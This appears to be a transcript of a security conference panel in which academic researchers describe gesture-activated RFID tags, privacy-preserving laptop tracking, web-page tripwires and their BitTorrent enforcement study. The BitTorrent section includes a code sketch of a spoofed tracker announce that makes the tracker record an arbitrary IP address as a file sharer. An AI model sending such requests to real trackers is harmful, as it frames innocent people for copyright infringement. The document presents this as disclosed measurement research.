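Here's a toy version of that matching loop, with one stored template per card. The window size, normalization, and mean-squared-error threshold are all made-up illustration values; the real WISP firmware has to do this on a tiny MSP430 with an intermittent, harvested power budget.

```python
# A toy version of the gesture-gated tag: stay silent unless the recent
# accelerometer window matches a stored handshake template. Window size,
# normalization, and threshold are made-up illustration values.
import numpy as np

WINDOW = 64  # accelerometer samples per decision window (assumed)

def normalize(w: np.ndarray) -> np.ndarray:
    return (w - w.mean(axis=0)) / (w.std(axis=0) + 1e-9)

def matches(window: np.ndarray, template: np.ndarray, thresh=0.15) -> bool:
    """Mean-squared error between the normalized motion and a template."""
    return float(np.mean((normalize(window) - template) ** 2)) < thresh

def tag_loop(samples, templates):
    """templates maps card identity -> normalized gesture template.
    Yield an identity (i.e., allow an RF reply) only on a match."""
    buf = []
    for s in samples:            # s = (ax, ay, az) accelerometer reading
        buf.append(s)
        if len(buf) == WINDOW:
            w = np.array(buf, dtype=float)
            for card, tpl in templates.items():
                if matches(w, tpl):
                    yield card   # unlock the response for this card only
            buf.clear()
```

The design point is that a relay attacker can still proxy the radio link, but only during the brief window when you're deliberately performing the handshake, which is exactly when you intend to authenticate anyway.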
We also thought about doing another gesture we called TTB, tap that butt: you could just kind of tap it and activate it. But this opens up some vulnerabilities; people become very eager to help you authenticate in those cases. And it's maybe vulnerable to a dancing-ninja attack, in which an attacker coerces you into dancing some certain way, waving your butt back and forth. But anyway, that's that. I'll hand it back off to Yoshi. Thanks. Well, thank you, Alexei. I guess we want to make sure we avoid other people helping you authenticate. So this is another example of the types of research we want to do: again, we're trying to identify security problems in important systems, and then address them. One of the other building-type research projects we did focused on laptop tracking systems. Many of you probably know that laptop theft is a fairly big problem, and there's actually a fairly large number of companies providing services to help people protect against lost or stolen laptops. This software basically runs on the machine and uploads its location information to a central server periodically, once every half hour or something like that. Of course, a sophisticated adversary could remove the software, but many laptop thieves aren't that sophisticated, and so this software is actually quite effective in practice. But the question we started asking ourselves, as privacy advocates, is: do these existing laptop tracking systems compromise their users' privacy? Here's an example of how that might be the case. This private location information is going to the laptop tracking company, and location information from other types of systems has been subpoenaed in the past: E-ZPass toll records have been subpoenaed and used in divorce cases, and maybe laptop tracking data could be used the same way. Governments, or insiders at the company, sometimes use their extra access to compromise people's privacy. Another issue we wanted to address is: if someone gets access to your laptop, could they compromise the security and privacy properties of the laptop tracking software and figure out everywhere you've been in the past, maybe as you're crossing borders, whatnot? So we invented some new cryptographic techniques that can provide laptop tracking services while also preserving privacy. Here's the model, and why it's somewhat interesting: we wanted to create a system that lets us use a third party to help track our laptop's location, without that third party ever being able to learn our location. To solve this problem we used some cryptography: basic encryption, things called forward-secure pseudorandom bit generators, a little bit of identity-based encryption for some threat models, et cetera. We really had to design the system around that goal. We leveraged OpenDHT, and this is now an open source system: if you Google Adeona, which is named after the Roman goddess of safe returns (she's supposed to return children safely to their parents after they leave for the first time), you'll find it. And of course it's open source, so we'd love anyone to help us make it better.
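To give a flavor of the forward-secure idea, here's a toy hash-ratchet sketch, not the actual Adeona construction: each update derives a storage index and an encryption key, then irreversibly steps the state, so someone who seizes the laptop learns nothing about where earlier updates live or what they say. The encryption here is a dependency-free placeholder; real code would use an authenticated cipher.

```python
# A toy hash-ratchet sketch of the forward-secure idea, not the actual
# Adeona construction. Each epoch derives a storage index and a key, then
# irreversibly advances the state; seizing the laptop reveals nothing
# about past epochs. Real code would use an authenticated cipher.
import hashlib
import os

def ratchet(state: bytes):
    """Derive this epoch's (index, key), then step the state one-way."""
    index = hashlib.sha256(state + b"index").hexdigest()   # where to store
    key = hashlib.sha256(state + b"key").digest()          # what to encrypt with
    next_state = hashlib.sha256(state + b"step").digest()  # irreversible
    return index, key, next_state

def mask(key: bytes, plaintext: bytes) -> bytes:
    # Dependency-free stream-cipher-style placeholder for real encryption.
    pad = b""
    while len(pad) < len(plaintext):
        pad += hashlib.sha256(key + pad).digest()
    return bytes(a ^ b for a, b in zip(plaintext, pad))

state = os.urandom(32)  # the owner keeps a copy of this initial seed
for location in [b'{"ip": "10.0.0.1"}', b'{"ip": "10.0.0.2"}']:
    index, key, state = ratchet(state)
    print(index[:16], mask(key, location).hex())  # (index, blob) -> OpenDHT
```

The owner, holding the initial seed, can re-derive every index and key to retrieve the trail; the storage service, and a thief holding only the current state, cannot walk the ratchet backwards.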
But in the interest of brevity, let me go on to the next aspect of the types of security research we do, and that's measuring what's actually happening in today's world. The idea here is that lots of things are happening: people are connecting to the internet all the time, ads are out there, spam is out there, botnets are out there. We want to measure the scale of these attacks and artifacts, and we want to do it in a scientific, rigorous way. One project we did, in collaboration with Nick Weaver, who is here in the audience, or I think he was, was on detecting in-flight changes to web pages. Many of you might have seen, in the summer of 2007, lots of postings on Slashdot and other media articles about ISPs actively injecting ads into people's web pages. This was fairly early in the process, and what we at the University of Washington wanted to do was ask: is this really occurring? How broadly is it occurring? What could the side effects be? And how might we protect against it? The first step is to scientifically measure the phenomenon. We created a little infrastructure: we made our own web page, with a little thing we called a tripwire in it. If a user visited our page, they would get the page with a little piece of JavaScript on it, which would do a self-inspection to make sure the page was unmodified. If an ISP or someone else modified the page in flight, perhaps injecting an ad or doing something else, we would detect it and report it back to our server. This way, as people came to our website, we could figure out which ISPs, or which other parties, were modifying web pages. Clearly, we needed to collect a lot of data; data is the source of a lot of scientific analysis. So we posted this page to Digg and some mailing lists, someone very graciously put it on Slashdot, and 50,000 unique visitors came to our web page. From that we got a glimpse of how broadly this was happening across the internet. And it turns out it really was happening: of the 50,000 visitors with unique IP addresses, about 650 saw changes to the page, which is 1.3%. To me, that's a fairly large number if you think about how many people are on the internet. About 2.4% of those, a total of 16, were ISPs injecting ads. We actually saw some interesting indications that they might be trying to blacklist or whitelist our tripwire code. But we did see this happening; we have not redone this study, so I don't know what the current state is, but ISPs were modifying pages in flight.
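The real tripwire was JavaScript delivered in the page itself, so each visitor's browser did the check from its own vantage point. Here's the same idea as a standalone probe you could run yourself; the URL and the known-good digest are placeholders.

```python
# The real tripwire was JavaScript in the page, so each visitor's browser
# checked the page from its own vantage point. This is the same idea as a
# standalone probe; the URL and the known-good digest are placeholders.
import hashlib
import urllib.request

URL = "http://example.com/tripwire.html"  # a page whose bytes you control
KNOWN_GOOD_SHA256 = "..."                 # digest of the page as served

with urllib.request.urlopen(URL) as resp:
    body = resp.read()

if hashlib.sha256(body).hexdigest() != KNOWN_GOOD_SHA256:
    print("page was modified in flight (proxy, ad injector, ...)")
else:
    print("page arrived unmodified")
```

The in-page JavaScript version is what made the measurement scale: every one of those 50,000 visitors became a measurement point on their own access network, rather than us probing from one place.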
We also found some interesting side effects that we didn't expect. Many people here probably know about cross-site scripting attacks, and the vulnerabilities in web pages that allow them. Say a web page is not vulnerable to cross-site scripting, just as the content developer intends. Well, it turns out there's software people run on their own machines for legitimate purposes, maybe to block ads or do other things, that modifies web pages in flight, and some of these modifications to safe web pages actually introduce cross-site scripting vulnerabilities. Basically, what this means is that if you were using the old versions of Ad Muncher or Proxomitron, or some other such systems (sorry, they've since fixed the problem), the website itself might be safe, but with that third-party software in the path, Bank of America or wherever you were going was no longer safe. I'll go ahead and skip through this part because I do want to make sure we have enough time for discussion, but we also created some techniques for defending against this that are hopefully more lightweight than standard cryptography, and I'll put those online. These things are not perfectly robust against intelligent adversaries, but we're trying to strike a balance between security and cost. Let me now turn it over to Mike, who I think will talk about something else you might be interested in. Hi, well yeah, I hope you'll be interested in it. I'm Mike, and I work primarily on peer-to-peer systems. I'm going to tell you quickly about some measurements we performed at the University of Washington of exactly how copyright enforcement agencies do monitoring and enforcement on these networks. There's a website URL up here that has more information about this project. Let's start off with something that probably everyone in this room knows: why copyright agencies are interested in monitoring peer-to-peer networks. Quite simply, there's a lot of purported copyright infringement going on on these networks. This is just a screenshot of a popular BitTorrent website, which you all probably recognize, where you can go off and download tons of movies for free. Of course this hasn't gone unnoticed by the people who produce these movies, and they're interested in identifying people who are doing this and telling them: hey, stop that. So what are they doing today? Well, it's a pretty simple process, really. Peer-to-peer monitoring today is three steps. First, these agencies crawl peer-to-peer networks, participating in the protocol in mostly the exact same way that users do when they're downloading. Second, they identify infringing users; that's the crucial step, exactly how they do that, but for now let's leave it abstract. And then, once they've identified allegedly infringing users, they send a notice to ISPs called a DMCA takedown notice. You're all probably familiar with the DMCA: a law passed in the late 90s that defines new penalties for copyright infringement on the internet, and also defines ways to mediate reporting and takedown and so on and so forth. Let's start where we have direct experience, and that's with actual complaints, the third step here. As I mentioned, our study is a measurement study, so we went out and actually tried to attract complaints, and this is some anonymized text from a real complaint that we received. At the website I showed at the beginning of the talk (I'll put the URL up at the end), there's a complete complaint. For us, the really interesting part is this highlighted portion, which is the key portion in my opinion: okay, we recognize what you did, you're doing something wrong, blah, blah, blah, "to the best of our knowledge." So what does "to the best of our knowledge" really mean?
So that brings us to our work. Our goal was to reverse engineer exactly what these monitoring and enforcement agencies are doing in one particular peer-to-peer network, BitTorrent. Our main result (there are more results in the paper) is that the monitoring these organizations use right now is sometimes inconclusive and, even more surprising, can be manipulated. We were able to frame arbitrary network endpoints for copyright infringement and actually receive notices for them.

Let's start by talking about two ways you might monitor these networks; I can think of at least two, and there are probably more. First, you might think this is pretty easy: if you want to find out who's downloading something on a peer-to-peer network, just go out, join the network, download stuff, and the people you receive data from must have gotten it from somewhere, so they're probably downloading. It turns out that's not the method a lot of these organizations are using. They're instead using something we call indirect identification, where users are identified as sharing files based on the reports of a trusted third party.

Let's talk a little more about how direct identification in BitTorrent would work. Many of you are probably familiar with what BitTorrent is and how it works; it's a large-file distribution tool. A data source here, S, has a large file and splits it into four blocks; those are the colored blocks at the top. If some direct monitoring agent, M, wanted to see what was going on: in normal file distribution, blocks are distributed from the source and redistributed by all the other peers in the mesh, the monitoring agent and all the other peers get all the blocks, the distribution ends, and the monitoring agent knows: hey, I got blocks from S, A, and B. That's how you might monitor things directly. But to actually form this overlay mesh, there's a bootstrapping phase where a monitoring agent M needs to learn: who can I potentially get data from? Who are the potential S, A, and Bs?

And that brings us to how indirect identification works. Instead of downloading data from users directly, in the bootstrapping phase of BitTorrent, M can ask for a set of peers it could potentially receive data from; that's how it joins. Joining the system, you contact a centralized entity, in this case called a tracker, and ask: who's currently participating in this distribution? Who's a potential replica for this data I'm interested in? What we actually want to do here is, instead of saying, hey, I'm M and I'm interested in joining this distribution, please give me a set of potential peers (which implicitly advertises you as a future data source), we want to say: don't record M as joining. Say that some other arbitrary user, X, is going to join this swarm, and give out X's IP address later when other people ask for replicas. It turns out there have been protocol extensions to the BitTorrent tracker protocol that allow us to implicate arbitrary IPs in exactly this way; they exist to support proxy servers, and trackers and downloaders behind the same NAT. So what does a spoofed request that implicates a user actually look like?
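Here is a rough sketch of such a request, assuming a plain HTTP tracker. The tracker URL, info hash, and peer ID are invented for illustration; the interesting part is the optional ip parameter.

```typescript
// Illustrative sketch of a spoofed tracker announce; all values are fake.
// The optional "ip" parameter, intended for proxies and for trackers and
// downloaders behind the same NAT, asks the tracker to record a *different*
// address as a member of the swarm.

const tracker = "http://tracker.example.org/announce"; // hypothetical tracker

const params = new URLSearchParams({
  info_hash: "<20-byte hash from the torrent metadata>", // placeholder
  peer_id: "-XX0001-000000000000", // arbitrary 20-byte peer id
  port: "6881",
  uploaded: "0",
  downloaded: "0",
  left: "0",
  ip: "a.b.c.d", // the framed endpoint, handed out to future peers as a replica
});

// One HTTP GET, the same thing a one-line wget command would do.
fetch(`${tracker}?${params}`).then((res) => console.log(res.status));
```

The tracker does not verify that the announcing client actually controls the address in the ip parameter, which is what makes this kind of framing possible.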
Well, the BitTorrent tracker protocol is just some window dressing on HTTP, so it's actually as simple as a wget request. If you wanted to implicate a.b.c.d here, after some post-processing of the torrent metadata, it's a request along those lines. So we went out and did this. We wanted to underscore just how ridiculous it is to rely on indirect reports as authoritative, so we looked for the most ridiculous devices we could generate DMCA complaints for. We worked with the university's DMCA response team and said: hey, we're going to be trying to frame these IP addresses; any complaints you get for them aren't legit, just send them to us.

So what did we frame? We started with a printer, and we managed to get quite a few complaints for it, and we made this graphic for the website, which I think is pretty fun. We also managed to implicate some other nonsense devices: we got five complaints for a desktop machine that was under our control the whole time (we know it wasn't running BitTorrent or anything), nine complaints in total for three IP printers, and complaints for a wireless AP that was not running NAT and had no users behind it; it was just a wireless AP with an IP address, and it too was apparently downloading things. We didn't try any IP addresses where we couldn't say for certain that the complaints were bogus, because we were concerned about generating complaints for innocent users.

One of the most interesting aspects of this work is the implications, and for me there are three main takeaways. First, today there's a kind of Wild West style of enforcement. I mentioned that some organizations rely on indirect detection; not all of them do, some are downloading directly, but there's still not a lot of transparency in this whole process. Second, as a result, ISPs are sometimes setting arbitrary penalties for receiving a DMCA takedown notice: it can mean you have to go to a class on copyright law if you're at a university, or you get your network disconnected, or sometimes they just forward you the complaint and that's the end of it. And monitoring agencies are using arbitrary methods; as I mentioned, some use better methods than others, but it's hard to tell without doing this kind of work. Third, the potential for false positives, which we demonstrated experimentally, implies a need for standardization of this whole process and more transparency in it, so we can actually audit these agencies openly. So, thanks very much, and I think Yoshi will say a few words next.

Yeah, so as Mike said, and as we've been saying the whole time, the purpose of this was to give a glimpse of the types of projects we do in academic security research and how we do them. Of course, we are only a very small subset of the academic security community, and if you're interested in this community, I suggest you go to conferences like ACM CCS, the Computer and Communications Security conference; NDSS, the Network and Distributed System Security Symposium; IEEE Security and Privacy; and USENIX Security. USENIX Security will be in Montreal this year or next, and associated with it are the workshops HotSec, which is Hot Topics in Security, and WOOT, the Workshop on Offensive Technologies.
And of course, we'd be delighted if you talked with us. John will be talking about the counterpoint, so I just wanted to summarize the academic side. One thing to keep in mind is the peer review process we have to go through. If you're unfamiliar with it: you submit a paper to a conference, and it has to be a very well-polished paper with lots of experiments in it. Three or more people within the community read the paper and provide reviews to you, and then a program committee meets and discusses the paper (discusses all the papers, or many of them), and some subset are accepted. So if you're interested in this academic process, please also let us know.

I also wanted to briefly mention (I know there's a talk at noon, unfortunately) some of the other things we're trying to do in the academic security community, on the education front. One of the things that struck me when I first came to academia (I don't know if I mentioned earlier, but I'm an assistant professor at the University of Washington) is: how do you actually teach people computer security? What is the fundamental thing you want students to know and take away from your course that they can still use 10 or 15 years down the line? One thing that becomes blatantly obvious is that technology changes so quickly that if a course focused only on technology, the students might have difficulty addressing the security needs of future systems. So what I tried to do was create a way to change people's thought process. If there's one thing I want students to take away from my course, it's the ability to see a new product out there, this miracle Foo, and immediately start thinking not "the miracle Foo looks great, I can't wait to use it," but "the miracle Foo looks great, I want to use it, but I wonder if I could break it in this way." That's what I try to get my students to do. So I created a blog, and multiple times during the course the students had to look for newly announced products, or products seen in the media, and write a security review about them. It's kind of like our academic studies, but a little lighter weight: who the adversaries are, what the assets are, et cetera. Bruce Schneier wrote a little bit about this, and you can read more about what the students did and why we ran the course this way, if you're interested or if you're an educator in the audience. People attacked eldercare systems, OnStar, traffic lights, safe deposit boxes, dorm rooms, smart pill boxes that are supposed to dispense pills at periodic intervals, and whatnot. If you Google any of our names and the class, you'll be able to find our web pages that have this URL.

But with that, I want to turn this over to John, who will provide the industry perspective on the hoped-for future highway between academia, industry, and others.

Thank you very much. Just a few words about who I am: I'm co-founder of PGP Corporation, I've been doing OS security and crypto for many years, and I worked at DEC for many years.
I've worked at Apple, I worked at Counterpane with both Yoshi and Bruce Schneier, and I've worked on a number of internet standards, including OpenPGP, DKIM, anti-spam, and so on. So how do we feel about this in industry? The smart people love this. Part of the problem is that stupidity is the second most common element in the universe after hydrogen; even more common than helium. And I want to help people get smart. It's very similar to what Yoshi's doing with the undergraduate students: I want to help industry realize that this is actually good for you, and that if you understand what's going on, this is nice. Part of the problem is that a lot of people will get an email message saying, hi, I'm Professor So-and-So from the University of Wherever, and here's a preprint of a paper that we think you should look at, comment on, and check for factual problems. And you get that sinking feeling in your stomach. You start to do other things, all the little blood chemicals that set off the fight-or-flight impulses go off, and that makes you stupid. When you see those cases where the lawsuits come flying in, this and that, that's the fight-or-flight impulse making people be stupid, and you don't want to do that. What you should be saying is: can I be on your press release?

Also, the market frequently punishes secure products. I once worked on a file server product, and one of its advantages was that it was much more secure than the others, and people weren't buying ours. We asked people why they didn't think this security stuff was important, and one customer we talked to said: well, why do I need this security stuff when I can just go out and buy a UPS and plug the thing into it? As one of my colleagues put it, there's no arguing with logic like that. If people don't know about security problems, they don't value them, and people will not pay for things they don't value. Worse, when people get used to things that are not secure, it's extraordinarily hard to get them to upgrade to things that are secure, because they presume that since they've been using the insecure thing for so long, and apparently nobody's ever done anything to them, the good stuff isn't worth it.

The hacking itself is extraordinarily important because it shows the limitations of present thought. I find all of this absolutely amazing, because it's "wow, I didn't think of that," or in many cases, "huh, I wondered if you could do that." It also shows what's important. As I've said, it is widely believed that people don't buy security and don't care about privacy. So should we care ourselves? If people are not going to buy our system, if they're going to buy the one that costs a nickel less and doesn't have security, then should we be caring about it either? It also helps those of us who build things, because a lot of times something new comes out and it's being advertised as the greatest thing, sliced bread 2.0: does it actually work? What are the downsides? Who's making something where you look at it and go, I wouldn't buy that? It's really nice to have independent voices who will go out and look at something. There's no better way to test a system than to get an independent set of eyes on it, better than any automated tools, better than anything else. Independent smart guys and gals are the best way to test something.
Practice is always better than theory, and the devious minds of people who start learning how to do this will do the best testing. I also think that peer review is vitally important. It not only adds weight to the results, it provides safety to the people doing the work. Nobody can say, oh, you guys had an axe to grind; no, four people looked at this thing. It helps everybody. It gets rid of the political debate of "you only think that because...," and it also gets people's attention. Some of the best hackers around are academics, and some of the best researchers are hackers; I think the communities need to talk to each other. I've testified to Congress and pointed out that the best researchers around are not just people at universities; they are people who come to places like DEF CON.

So we want to work with the scientists, because peer review helps science, it helps technology, and it helps us build better things. At PGP, we put our source code up on the web for many years because we want peer review. We want anybody in the world to go look at it. It's kind of like saying: come into my kitchen, see if you like what's going on. I also hire researchers to test us. When I heard about the Diebold results, I called up Avi Rubin and said: would you like to work on my machine? Take it into the back room, see what it'll do. If you're smart, you will pay people to do these hacks for you. There's now starting to be an entire industry of people, like these researchers, who do this kind of research for pay, because, the way I put it is: what's it worth to you to not be on the front page of the New York Times? The smart people feel exactly the same way. This makes us deliver better products. It makes us deliver things that you want, and it makes you want the things we deliver, because if you don't want security, we're not going to put it in there, since it costs more.

Next, your turn. Yes, thank you very much. So as John said, I believe there's fantastic security work being done on all sides of the realm of computer security, and computer security is very large: industry, this conference, academia. We really want to figure out how we can build this highway between the different communities and create further discussion. Just to start things off, some questions we had that we thought you might be interested in, and that we're also interested in: What can and should we learn from you? How should we go about doing that? What do you think we could do better? What should we be looking at next? What shouldn't we be doing? That's also a very important question. And the who, what, when, where, and why of anything else you might ask. So with that, I'd like to open it up to the panel discussion.

Yes? Oh, no, I was just gonna sit down so we can all share it, but you keep... So you said that was addressed to a specific point of John's, right? Yeah, so for those of you who didn't hear, the question was: there are lots of threats out there to different systems, and which are the important ones, and how can we address them? I actually don't have a simple answer to that. One of the things we try to do from an academic perspective is, first, to understand what the threats are, and hopefully to paint as big and complete a picture as possible of what all the different threats are and what they might compromise.
And then we have to bump it up to a broader discussion. I think the key thing is that when you think about these systems, whether it's a medical device or a voting machine, the technology doesn't exist in isolation; there's a huge ecosystem surrounding it. There are the doctors, there's the FDA, there are the patients themselves. It's a much bigger issue. So we started the process by focusing on the technical part, and now we're moving toward the bigger-picture issues. We're actually talking with the FDA, trying to come to some sort of understanding. And to come to that understanding: I don't feel comfortable coming to a conclusion by myself about the right level of security for a pacemaker or a medical pump, because I don't have the medical expertise. So really, the research starts this dialogue with the other communities that have broader expertise.

I'll say it's the same sort of thing from my side. One thing you can do, when you see somebody doing something similar to what you're worried about (you've seen what these guys do, and the slides will have their email addresses), is send them an email and say: hey, have you ever considered blah, blah, blah? Sometimes it won't take, sometimes it will. I've suggested things to people a number of times before getting somebody to do research similar to what I wanted, because this is the way the testing will get done. And when somebody comes up with something interesting, it starts opening up questions we wouldn't have considered otherwise. People were accepting voting machines carte blanche until somebody actually started testing them. The thing that's going on now is this whole question of: we're all going to be subject to internet-controlled health care in the next 30 years, so what should the FDA be doing about it? That question is only starting to be asked now, because of things like this. So suggest something to these guys that would work, or something you're concerned about.

And actually, Alexi suggested I might have misunderstood your question in my response. Yeah, yeah, I think we did. Okay. Okay, yeah. So, I think this is on a case-by-case basis, but my experience in the past is this: I think it's very important to figure out some concise way to demonstrate or express that this is actually an issue, and then to start talking broadly with other people in the community who might be able to corroborate your statement. I mentioned that for the medical devices we have been talking with the FDA, and the people at the FDA are very supportive of this. They understand the issues, and they understand the challenges to addressing them too, and there are some fundamental challenges. My short answer is: it still has to be case-by-case, but try to argue the issue as crisply as possible. Yeah, it's going to have to be case-by-case, because it depends on who would be the appropriate people to do the right work.
Ten years ago or so, there were people who did very interesting psychological work on how easy it is to induce repressed memories. Repressed memories were starting to become this new thing that people thought was valuable, and serious research, on what was essentially hacking the human brain, showed that this was questionable. There are all sorts of other things we could start coming up with, and if you've got an idea, send it to somebody. Yeah, in the back? Oh, sorry, I guess there's one here?

Yeah, so the question was: when you're analyzing some product or some system, are you concerned about the maker taking legal action against you? The first thing I should say is that at the University of Washington, and I think at many other places, we do try to make sure that what we're doing is legal. We talk to legal counsel before beginning a project, and there are things we have thought about doing for past research projects that we did not do, because, again, we want to do the research, but at the same time we want to make sure we uphold the law. That doesn't mean some company might not still come after us. So the question is, again, are we silenced? The truth is that academics are given extreme freedom in what they can do; that's one of the reasons I'm in academia, that we can choose all these different projects. But the law is the law, and if we conclude we shouldn't do something, then we don't. Yep, there's one.

Ah, so there are actually two related questions I might expand on. The question was: how do you draw the line and say, this research is cool, but I shouldn't go there? There are two questions we have to address. One: is it ethical to go there? Two: is it legal to go there? I'm not a lawyer, so I can't decide whether something is legal or not; I have to talk with the people wherever I am about the legal aspects. And by the way, for any of you interested in going into academia: investigate how comfortable the legal department is with the computer science department, because different schools have different thresholds of tolerance. The second question, whether it's ethical, is very important to think about. I might mention this in the context of our medical device work, since it's clearly related to people's lives: should we come out with results showing how to make an implantable defibrillator issue a large shock, or not? This comes back to (sorry, I don't know your names) the previous question: there's actually a lot of value in showing that there are security issues now, while these devices are still moderately short-range and not as sophisticated. We felt that from an ethical perspective it was more important to do this now, rather than wait 10 or 15 years, when these devices will have evolved and security perhaps still won't have been considered.

I'll also add that one of the advantages universities have is that many of them do in fact have a legal department that is very good at defending its researchers, and that researchers can talk to upfront.
There are also decades of work on what is acceptable in human experimentation, the protocols that medicine, psychology, and sociology have had to develop for themselves. So researchers have the resources to go to someplace and ask: what do you think about this? And often what comes back is: we don't like this thing, we don't like that thing, and if you change this to that, then it's okay. That lets them figure out exactly what they will do, so they can go right up to the line and say: we also had this set of peers tell us that this was okay and that wasn't. And that helps everybody.

One more comment about that. In academia, as John said, we have the support of a whole legal team, so it might actually be a lot harder for a company to go after us. Second, it looks a little different in the press if your company goes after an educational institution as opposed to a hacker. So in that sense, we get a lot more slack in what we can do. Also, if we want to work with a company, companies are much more willing to work with institutions than with rogue agents. If we want to go to a company and say, hey, I think you guys are doing something wrong, how about we help you, how about you give us code and we look at it, they might look at that differently when we have a whole university behind us than when you're by yourself.

[Inaudible question from the audience.] Fantastic, yeah, good job, that's great. I suspect John might have more direct comments, because you've actually hired people, but I'll start. At the highest level, I agree that this is a fundamental challenge, and I'm not sure. The ideal you paint is a great one, where in the future everyone has a security mindset: the managers have the mindset themselves, and they know to hire developers who have that mindset. I think there are going to be many, many steps for us to get to that point, if we can in fact get there, and I'm not sure what all those steps are. But in the short term, again from my course (and I've gotten emails from other people interested in copying the same approach), my hope is that when these people are working in industry 10 or 15 years from now, they will have this mindset, and when they see a new system, they probably won't know how to fix it, or maybe even how to break it anymore, but they'll ask the question and then go hire the people who can. So it's a grassroots approach: get more and more people to think that way, and maybe other classes at other universities will also try to teach people and give them an opportunity to think about security. It's not without challenges, though, and I'm still not sure exactly how to do it, so maybe I'll open it up to the audience, after John's remarks if he wants to make any. If there are any suggestions on how to do this, I'd love to hear them, because I've been racking my brain for five or ten years on this subject: how can we get people to think about security more the way we'd want them to?

I think the bad news is it's going to take decades.
But I'll also say that while it's very good to have some people with a security mindset, you wouldn't want everyone to have one, because there are an awful lot of things we all enjoy that we wouldn't have if everyone worried about the security. I mean, we would never get into cars if we worried about this. We make risk decisions all the time, and part of being a good security person is in fact saying: this has gone a little too far, it doesn't need to be quite that secure, because it also has to have other properties. But we do need to teach people, and to get a small number of people into groups where they can help. There are many, many people in industry who are trying to get groups to do better jobs, sprinkling security folks around, not in one security group but throughout, because that's what happens: the natural growth is that first you pull the security people together, and then you push them out. You start by centralizing, and then you decentralize. Get more people learning this, more people thinking this is fun and interesting. That's part of why we're doing this panel: to get more of you thinking that it would be fun to write academic-style papers. There are an awful lot of things hackers do where they get a significant result, and if we're lucky it becomes a PowerPoint presentation, and nobody writes it up. So I'll be the first one to say it here: learn to hack LaTeX. There are so many web tutorials; go Google "learning LaTeX." It's pretty: if you put out one of these things, it really looks good, it looks like something, and then you can start putting it up on your web page in that format. And that's one of those mental things that happens to people: if you learn to start producing your results as a short three-to-five-page paper ("I did this, and here's what the results were"), that also helps, and that will continue to spread it out. There's a minimal paper skeleton sketched below.

Until those who are not security professionals demand secure products, organizations are not going to hire developers who create secure software, and therefore there's not going to be as much demand for security knowledge in university programs. It's all supply and demand, but we have to make sure that people who are not in this room know they have to ask for secure products. You can't just buy for functionality if you face high security risk.

Absolutely; his comment was that we have to educate people to demand security, and that's absolutely true. I used to say in the talks I gave ten years ago that lots of data is being lost every day; those of us in the industry go out for drinks and tell each other horror stories. It wasn't until the combination of consumers affecting law, of laws requiring disclosure, that we started learning everything that's going on, and now consumers are demanding a level of security in a lot of systems that they weren't before. That's one of the other things these hacks do: people say, oh my God, you can do that? And once they do, you can start saying: I could fix that, but it would cost an extra dollar; is this worth a dollar to you? And when they start saying, damn straight, I'd pay five, then everyone will do it.

So I might have one other response to that, building on John's response, which I think is great: these hacks can raise awareness.
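Picking up the "learn to hack LaTeX" suggestion, here is a minimal sketch of the kind of three-to-five-page writeup skeleton being described. The title, author, and section prompts are placeholders, not anyone's actual paper.

```latex
\documentclass{article}

\title{A Short Writeup of Our Hack}            % placeholder title
\author{Your Name \\ \texttt{you@example.org}} % placeholder author
\date{}

\begin{document}
\maketitle

\begin{abstract}
One paragraph: what you did, what you found, and why it matters.
\end{abstract}

\section{Introduction}
What system you looked at, and why anyone should care.

\section{Method}
What you actually did, in enough detail that someone could repeat it.

\section{Results}
What happened, with numbers where you have them.

\section{Implications}
The bigger picture: defenses, lessons, and the societal context.

\end{document}
```

Running this through pdflatex produces a clean, academic-looking PDF, which is exactly the "dressing the right way" effect John describes later.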
But when John said that, it reminded me of the fact that oftentimes these hacks end up in the New York Times or other media venues, and that creates a short spurt of interest in the topic. It might last, as in the case of e-voting; it might not, as in the case of some other systems. But maybe, and this is just an idea that came to my mind, the reporters in this audience, or other people who talk about technology, could help here. Reporters have a great ability to reach a broad population; as a professor I can reach some population, but reporters can reach many more. So maybe a neat thing to try in the future, whenever talking about a new product, is to always talk about what the potential security issues in it could be. I don't know if this would fly from a press perspective, but they might be able to help us. Any other questions? Yeah, over there.

So the devil's advocate in me says: okay, attack high-profile subjects like senators. (That comment was not representative of the university or of the others on the panel.) The problem is that senators can't use computers. I'm not sure who was first, so maybe. I think some of it is unstoppable, but some of it isn't. The work they've done on gestures with RFID devices is something completely new. I certainly hadn't thought of it before, and when you see that this is possible, all of you now have the ability to go tell people: I saw people from the University of Washington give a paper on how you could make an RFID tag activate only if you wave it in a triangle or a square, or do an interpretive dance. And this is a worrisome problem. I have been an opponent of RFID passports, and one of the things I consider to be a huge threat is that there is nearly no way for the passport to not say: hi, I'm a passport. That means there's a certain class of attacks one could build off of that. This is an open area for research: these guys, and other people doing research, could go and build things. I know a bunch of people are doing RFID research, and part of what could be done in the future is to come up with ways to do privacy-preserving things. And there are conferences on privacy-preserving technologies.

Yeah, so, Carl, did you...? I didn't have too much to add to that, but I wouldn't assume the floodgates will just come wide open; bad things happen when you start to assume various things. I do think it is a very hard problem, though, and that's why we're really interested in looking at it now, before it actually becomes pervasive. It's conceivable you could do something fairly fancy with cryptography or something, but at this point we really have no idea how to do it; we're trying a couple of things. And I don't think it's going to be a purely technological solution. There's a group at UW called the Society and Technology Group, and we've been looking at a variety of new technologies and how they interact with the law. They are deploying a new transit card in Seattle that we've found some interesting things about. The original specification called for the University of Washington to be able to pull up trip histories, including your location, where you got on and off the bus, for every student and every employee. And we were able to get them to roll that back, in conjunction with the ACLU of Washington.
So we are looking at both technological and policy ways of addressing these challenges. I believe there's been a question over there for a while. Yeah, so for those of you who didn't hear, the question was broadly: we've talked about voting machines and pacemakers; what about the OnStar system, which controls cars? When are people going to start breaking that? At the highest level, there are a large number of research groups, both here at the University of Washington and elsewhere, that are interested in understanding these emerging technologies. In addition to cars, there's a whole bunch of other technologies that either are starting to emerge or will in the future. It just takes the right team and the right amount of time, so it's very hard to predict. I'll just mention that at DEF CON last year we were in the heat of analyzing pacemakers, and now this year I've actually been able to talk about it. But I can't predict an exact answer to that. Yep.

So, for those of you who didn't hear, the question was: can I comment on which things we did not do because we were concerned about breaking the law? And the answer is: I'm not going to, yeah. Okay. You'll have to talk to us afterward.

Okay, so unless someone else on the panel speaks up: I actually haven't looked at that yet. The student who did the web tripwires work might have been able to comment, but he's unfortunately not here right now, so I can't comment on that. Yeah, that's a good question: is there any technology for which there's not a privacy concern? So I think first the gentleman back there, and then in front. Oh yes, thank you.

